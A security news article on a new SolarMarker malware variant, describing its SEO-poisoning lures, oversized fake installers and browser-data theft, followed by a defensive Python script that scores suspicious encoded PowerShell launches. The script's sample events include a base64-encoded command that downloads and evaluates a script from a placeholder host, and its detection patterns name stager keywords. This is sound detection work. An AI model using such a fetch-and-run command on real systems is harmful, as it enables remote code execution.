This new SolarMarker variant uses updated techniques to stay undetected

Security researchers have revealed a new version of the SolarMarker malware that updates its defense evasion abilities to stay under the radar.

Researchers from Palo Alto Networks Unit 42 wrote in a report published this month that the latest version demonstrates an evolution from Windows Portable Executables (EXE files) to Windows Installer Package files (MSI files). “This campaign is still under development and will be using executable files (EXE) as in its earlier versions.”

SolarMarker, also known as Jupyter, uses manipulated search engine optimization (SEO) tactics as its primary infection vector. The malware is known for its information-stealing and backdoor features, which let the attackers steal data stored in web browsers and execute arbitrary commands retrieved from a remote server.

In February 2022, the operators of SolarMarker were observed using stealthy Windows Registry tricks to establish long-term persistence on compromised systems.


The evolving attack patterns spotted by Unit 42 continue this behavior: the infection chains take the form of 250MB executables posing as PDF readers and utilities, hosted on fraudulent websites that are packed with keywords and use SEO techniques to rank higher in search results.

The large file size lets the initial-stage dropper evade automated analysis by antivirus engines. The dropper is also designed to download and install the legitimate program while, in the background, it launches a PowerShell installer that deploys the SolarMarker malware.


A .NET-based payload, the SolarMarker backdoor is equipped with capabilities to conduct internal reconnaissance and collect system metadata, all of which is exfiltrated to the remote server over an encrypted channel.

The implant also functions as a conduit to deploy SolarMarker’s information-stealing module on the victim machine. The stealer, for its part, can siphon autofill data, cookies, passwords, and credit card information from web browsers.

“The malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts,” the researchers said.
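To make the evasion techniques described above (huge installer files, impersonation of legitimate software installs, and obfuscated PowerShell launched in the background) concrete from the defender's side, here is an added example that is not from the Unit 42 report or from this post. It scores constructed process-creation events, similar in shape to Sysmon Event ID 1 records, for the combination of "PowerShell spawned by a large, freshly downloaded installer with a hidden window and an encoded command". The field names, the 100MB "huge file" cut-off, the alert threshold of 3, and the sample command lines are all assumptions made for this example; the report itself cites 250MB droppers but prescribes no detection thresholds.

```python
import base64
import re
from dataclasses import dataclass

# Assumption for this example: the report describes ~250MB droppers, and many
# AV engines skip very large files, so anything over 100MB counts as "huge".
HUGE_FILE_BYTES = 100 * 1024 * 1024
ALERT_THRESHOLD = 3  # assumption: alert when three or more indicators line up

# PowerShell accepts abbreviated switches, so match -e, -ec, -enc and -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
POLICY_BYPASS = re.compile(r"(?i)-(?:ep|executionpolicy)\s+bypass")
STAGER_HINTS = re.compile(r"(?i)downloadstring|invoke-webrequest|invoke-expression|frombase64string|\biex\b")
USER_WRITABLE_PATHS = ("\\downloads\\", "\\temp\\", "\\appdata\\local\\temp\\")


@dataclass
class ProcessEvent:
    image: str           # executable that was started
    command_line: str
    parent_image: str    # executable that started it
    parent_size: int     # size of the parent's file on disk, in bytes
    parent_signed: bool  # Authenticode status of the parent (see note in score_event)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    parent = ev.parent_image.lower()
    if any(p in parent for p in USER_WRITABLE_PATHS):
        reasons.append("PowerShell spawned by a binary in a user-writable download/temp path")
    if ev.parent_size >= HUGE_FILE_BYTES:
        reasons.append(f"parent file is huge ({ev.parent_size // (1024 * 1024)} MB), likely above AV scan-size limits")
    # ev.parent_signed is deliberately NOT used to lower the score: the report lists
    # signed files among the evasion techniques, so a valid signature is not exculpatory.
    if HIDDEN_WINDOW.search(ev.command_line):
        reasons.append("hidden window requested")
    if POLICY_BYPASS.search(ev.command_line):
        reasons.append("execution policy bypass")
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        reasons.append("encoded command line")
        if STAGER_HINTS.search(decoded):
            reasons.append("decoded payload downloads or evaluates further code")
    return len(reasons), reasons


def analyze(events, threshold=ALERT_THRESHOLD):
    """Return [(parent_image, score, reasons)] for events at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev.parent_image, score, reasons))
    return alerts


# Constructed sample events (not real telemetry). The "installer" in event 2 mimics
# the report's pattern of a huge, signed, download-path PDF reader dropper.
STAGE_PAYLOAD = "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://example.invalid/installer.ps1')"
_ENCODED = base64.b64encode(STAGE_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -NoProfile -File \"C:\\Program Files\\Vendor\\update.ps1\"",
                 "C:\\Program Files\\Vendor\\updater.exe", 5 * 1024 * 1024, True),
    ProcessEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 f"powershell.exe -w hidden -ep bypass -enc {_ENCODED}",
                 "C:\\Users\\alice\\Downloads\\PDF-Reader-Setup.exe", 250 * 1024 * 1024, True),
    ProcessEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Date",
                 "C:\\Users\\alice\\Downloads\\notes-tool.exe", 3 * 1024 * 1024, False),
]

if __name__ == "__main__":
    for parent, score, reasons in analyze(SAMPLE_EVENTS):
        print(f"[score {score}] {parent}")
        for r in reasons:
            print("   -", r)
```

Only the second event trips the alert: the first is a vendor updater running a script from Program Files, and the third is a small downloaded tool running a harmless command. The scoring is additive on purpose, because no single indicator is decisive; a hidden window or a large installer on its own is common for legitimate software, but their combination with an encoded command that evaluates downloaded code is the pattern the report describes.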

Some sections of this post are sourced from:
